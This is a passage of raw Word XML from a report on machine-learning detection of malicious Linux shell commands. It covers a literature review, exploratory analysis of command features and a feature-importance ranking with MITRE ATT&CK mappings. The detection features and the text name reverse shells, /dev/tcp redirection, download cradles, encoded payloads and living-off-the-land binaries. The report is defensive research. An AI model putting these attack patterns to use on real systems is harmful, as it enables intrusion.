        <w:spacing w:before="200" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 2 — Literature Review: Trizna on ML for Linux Command Detection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Feature matrix — Trizna's approach vs. this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Trizna — SLP (2021)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This project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Feature type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A purpose-built </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>shell tokenizer</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (SLP) plus classical encodings (TF-IDF / hashing). The thesis: generic NLP tokenization mis-parses shell, so a shell-aware representation is needed.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Hybrid</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> — 43 engineered behavioral features (counts, ratios, entropies, MITRE binary-family flags) + character (3–5)-gram TF-IDF for the XGBoost-hybrid; a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>raw character-index sequence</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> for the 1D-CNN.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Model type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Classical ML classifiers over SLP encodings (the paper's contribution is the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>representation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>, not a new model). QuasarNix (2024) later adds an ensemble of classifiers with adversarially-trained variants.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XGBoost, RandomForest, 1D-CNN, IsolationForest, and a TF-IDF+LR baseline, composed into a 3-stage cascade with LLM arbitration.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Dataset type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Real </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Linux `auditd`</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> telemetry (single-organization logs), supervised. QuasarNix instead uses </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>synthetic augmentation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> — &gt;1M reverse-shell variants from ~34 templates.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Provenance-labeled, multi-source</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>: D1 curated corpora (HackTricks, GTFOBins, Atomic Red Team, PayloadsAllTheThings, QuasarNix, SLP) vs. D2 operational (Cowrie honeypot + real shell histories), held at an exact 1:3 attack:benign ratio.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Evaluation metric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SLP: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, reporting a lift from </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.392 → 0.874</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> on its security-classification task. QuasarNix: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>detection rate at an industry-grade FPR = 10⁻⁵</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>.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F1, ROC-AUC, PR-AUC, TPR@FPR=1%/0.1%</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>, plus per-source recall/FPR and near-duplicate-leakage audits.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Transfer / generalization tested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SLP: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>not a cross-corpus study</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (in-distribution). QuasarNix: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>yes</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> — black-box evasion attacks and adversarially robust defenses.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Yes, explicitly</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> — cross-dataset D1↔D2 transfer, leave-one-attack-source-out, and a source-separability confound probe.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="160" w:lineRule="auto" w:line="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Table 3. Feature-and-model extraction matrix comparing Trizna's SLP work with this project across six dimensions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Comparative analytical essay: two papers, and what we adopt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Our two peer-reviewed anchors are </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Trizna's SLP work</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (the "TOPS" line — char- and token-level ML on Linux command telemetry, summarised feature-by-feature in the matrix above) and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ShellCore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (IEEE Internet of Things Journal, 2022), which detects malicious shell commands with a purely </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>character-level</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> representation: character n-gram TF-IDF over the raw command string fed to logistic regression / random forest, with no hand-engineered features.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Semantic meaning the authors assign.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Both treat the command </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as the unit of meaning but locate the signal differently. Trizna engineers token- and structure-level features (lengths, counts, binary families) as behavioural proxies; ShellCore argues the discriminative signal lives at the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sub-token character level</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — the obfuscation, encoding and packed payloads that whole-token features miss. ShellCore's malware-only ablation is the decisive evidence: term-level accuracy collapses 99.08 → 67.48 while the character-level model holds 99.91 → 99.79.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Contrast, and adopt / modify / reject.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Trizna is interpretable but token-bound; ShellCore is representation-robust but opaque. For our pipeline we </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>adopt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ShellCore's char-level insight — a bounded char n-gram TF-IDF block unioned into the hybrid model lifts F1 from ~0.76 to ~0.87; we </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>modify</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> their unbounded representation into fixed, threat-mapped feature lists plus in-fold-only n-grams to prevent leakage, and we keep Trizna's behavioural intuition as the 43 engineered features; we </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>reject</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ShellCore's PCA step (opaque for a threat-traceability report) and its ungrouped evaluation protocol, where near-duplicates straddle train/test — our shape-grouped split is stricter and costs several F1 points. The upshot, confirmed in Ch8.3: the engineered features earn their place on interpretability and threat-traceability, while an untuned char n-gram baseline — vindicating ShellCore's thesis — still out-scores every engineered model on raw discriminative power.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 3 — Exploratory Data Analysis Findings (Dataset 1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The command-length histogram (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ch3_length_hist_dataset1.png</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, density-normalized and clipped at the 99th percentile) confirms that attack one-liners are, on average, longer than benign ones: benign commands center at a mean of 37.8 characters (median 29), while attack commands run to a mean of 52.4 (median 41). The right tail is decisively heavier for attacks — the 99th percentile stretches to 227 characters versus 147 for benign — which is what a payload-carrying reverse shell, download cradle, or base64 blob looks like next to a bare </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>git commit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The honest caveat is that this is a difference of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>distributions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, not of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>classes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: both labels pile up in the same 20–50 character body, and the benign curve fully envelops the attack curve there. A probe trained on length alone scores only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>AUC 0.611</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on the held-out test split (0.624 in-train), barely above the 0.5 no-skill line. Length is a real signal that is nearly useless as a standalone rule, because the overlap in the common range swamps the separation in the tail.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The per-feature variance-by-label plot (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ch3_variance_by_label_dataset1.png</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) makes the same point structurally and explains </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>why</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> length looks strong in aggregate yet fails as a discriminator. The features with the largest benign-vs-attack variance gap are dominated by raw-magnitude "shape" features: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>len_chars</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> alone accounts for a gap of ~1233 (attack variance 2055 is 2.5× the benign 822), followed by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>max_token_len</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and, further down, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>len_tokens</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>mean_token_len</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Crucially, the gap is driven by attack commands being far more </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>dispersed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, not uniformly shifted — attackers produce both terse </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-style probes and enormous encoded payloads, inflating variance without cleanly moving the mean. Below the size features, the gap ranking turns behavioral: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>b64_run_len</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (the longest base64 run) carries 4.3× the attack-side variance, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_abs_paths</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_sensitive_paths</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_redirect_out</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_shell_bin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (gap 0.15, rank 11) all spike. Taken together this describes the attack profile precisely — longer commands, longer individual tokens (encoded blobs, long URLs and paths), more base64, deeper reach into the filesystem (absolute paths, then </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/etc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/proc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-class targets), redirection into files or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/dev/tcp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and an explicit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> invocation.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Feature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Benign var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Attack var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Variance gap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len_chars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821.80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2055.09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1233.28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max_token_len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34.75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112.82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78.08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b64_run_len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19.17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82.09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62.92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len_tokens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16.63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36.27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19.64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mean_token_len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7.06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13.04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5.98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n_quotes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2.56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4.89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2.33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n_flags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1.76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2.63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0.87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n_abs_paths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0.12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0.86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0.74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n_sensitive_paths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0.03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0.37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0.34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n_redirect_out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0.07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0.34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0.27</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="160" w:lineRule="auto" w:line="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Table 4. Per-feature benign vs. attack variance and variance gap on Dataset 1, ranked by gap.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 4 — Feature Ranking Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">XGBoost gain-based importance quantifies how much each engineered feature reduces training loss across the splits it participates in — a direct measure of the discriminative signal the model leans on, not merely how often a feature appears. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>report/figures/ch4_feature_importance_dataset1.png</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ranks the top-20 engineered features for Dataset 1; the leaders and their MITRE ATT&amp;CK mappings are summarised below (full RF-MDI, XGBoost-gain and permutation scores in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>report/ch4_feature_ranking.csv</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Top 5 Dataset 1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Rank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Feature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XGB gain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measures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MITRE ATT&amp;CK tactic → technique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n_abs_paths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0.181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Count of absolute-path tokens (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/etc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/proc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/tmp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>, …)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Discovery / Collection → filesystem targeting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has_dev_null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0.111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Output suppression via </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&gt;/dev/null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Defense Evasion → output/indicator suppression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has_shell_bin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0.097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A shell interpreter is named (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>bash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sh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zsh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dash</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>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Execution → Unix Shell (T1059.004)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head_is_lotl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0.045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command head </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>is</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> a GTFOBins/LotL binary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Execution / Defense Evasion → LotL abuse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/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>has_interp_bin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0.041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An interpreter is named (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>python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perl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ruby</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>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Execution → Command &amp; Scripting Interpreter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="160" w:lineRule="auto" w:line="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Table 5. Top five Dataset 1 features by XGBoost gain, with what each measures and its MITRE ATT&amp;CK mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The gain is steeply front-loaded: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_abs_paths</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> alone (0.181) outweighs the next two features combined, and the top three carry the bulk of the ranked importance before the curve flattens into a long tail of near-equal features. The model is not spreading confidence evenly; it bets heavily on a few dominant cues — where a command reaches in the filesystem, whether it suppresses its own output, and whether it invokes an explicit interpreter.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 5.1 — The Unified Feature Schema</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Every number in this section is measured against the current build. Sources:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>src/ingestion.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>src/features.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>src/preprocessing.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>results/ch3_feature_audit.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>docs/DATA_CARD.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>What has to be reconciled</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The two corpora are not two samples of one population. Dataset 1 is assembled from published attack catalogues and a payload generator on the malicious side (HackTricks, GTFOBins, Atomic Red Team, QuasarNix, SLP, InternalAllTheThings) and from documentation and instruction corpora on the benign side (tldr, bash-instruct, nl2bash, LinLM, bash_command_6k). Dataset 2 is real capture on both sides: attacker input from Cowrie SSH honeypot sessions, benign input from harvested </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.bash_history</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> files and commandlinefu. They are 15,248 and 9,576 rows, they share </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>no source at all</w:t>
      </w:r>
      <w:r>
        <w:t>, their licences differ, and one is written by people documenting commands while the other is typed by people running them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>What they do share is the artefact. Both, ultimately, are lists of Linux shell command lines, and that is the level at which the project harmonises them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 5.2 — Cross-Dataset Distribution Shift</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Because Section 5.1 established that both corpora pass through the same</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>stateless extractor, every difference reported here is a property of the data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">rather than of the processing. Sources: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>report/ch3_d1_feature_stats.csv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ch3_d2_feature_stats.csv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>report/ch4_feature_ranking.csv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
